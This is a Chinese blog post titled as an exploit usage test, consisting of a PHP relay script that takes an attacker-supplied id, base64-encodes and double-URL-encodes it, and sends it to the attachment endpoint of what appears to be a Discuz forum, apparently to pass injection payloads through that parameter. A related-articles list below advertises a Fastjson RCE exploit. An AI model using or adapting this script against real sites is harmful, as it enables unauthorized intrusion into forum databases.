<?php
global $tmp_expstr, $id;
$id=$_GET['id'];
//$_GET['$tmp_expstr'];
//$id=str_replace(" ","%20",$id);
//$id=str_replace("=","%3D",$id);
$tmp_expstr = $id;
//$tmp_expstr ="'";
//$id = $tmp_expstr;
function getData($host,$path,$expdata,$data){
global $host, $path, $tmp_expstr;
$host = "host.xxx.com";
$expdata = "/forum.php?mod=p_w_upload&findpost=ss&aid=".urlencode(urlencode(base64_encode($tmp_expstr)));
$data = "GET $expdata HTTP/1.1\r\n";
$data .= "Host: $host\r\n";
$data .= "Content-Type: application/x-www-form-urlencoded\r\n";
$data .= "Content-Length: ".strlen($expdata)."\r\n";
$data .= "Connection: Close\r\n\r\n";
$data .= $expdata;
$fp = fsockopen($host, 80);
fputs($fp, $data);
$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 7);
return $resp;
}
echo getData($host,$path,$expdata,$data);
?>
exp 利用测试
翻译上一篇:简单XSS测试
下一篇:centos 设置ip

提问和评论都可以,用心的回复会被更多人看到
评论
发布评论
相关文章
-
Fastjson小于1.2.68全漏洞RCE利用exp
jsonExploit.javapublic class Exploit{ public Exploit() {} static { try {
中间件 Fastjson RCE java bash json -
利用 DbUnit 测试
今天利用 [color=red]DbUnit[/color] 来 测试 涉及数据库 的公共类。因为是从 Excel 格式的文档读取
软件测试 Eclipse Java Excel IDE